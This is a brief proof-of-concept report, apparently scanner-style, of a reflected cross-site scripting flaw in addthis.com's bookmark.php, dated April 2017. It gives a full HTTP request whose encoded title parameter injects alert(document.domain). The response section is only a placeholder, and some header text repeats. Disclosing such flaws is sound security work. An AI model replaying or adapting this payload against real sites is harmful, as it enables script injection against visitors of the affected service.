XSS, addthis.com, Javascript Injection, location.query, Title + URL Parameter

XSS PoC for addthis.com
Target URL High Medium Low Info
http://www.addthis.com on April 2, 2017 0010

Alert Detail Click here to hide all alerts
Hide the alert
High (Verified) Reflected XSS
Description
Reflected XSS - Cross Site Scripting
URL http://www.addthis.com
Parameter location.query via Title and URL Parameters
Other information CWE-79: Reflected XSS, Javascript Injection

PoC in Chrome (Stable, Current)

XSS, addthis.com, Javascript Injection, location.query, Title + URL Parameter

REQUEST

GET /bookmark.php?title=%2522%253balert%2528document.domain%2529%252f%252f HTTP/1.1
Host: www.addthis.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: close
Upgrade-Insecure-Requests: 1

RESPONSE

HTTP Response for XSS in addthis.com XSS, addthis.com, Javascript Injection, location.query, Title + URL Parameter, Request + Response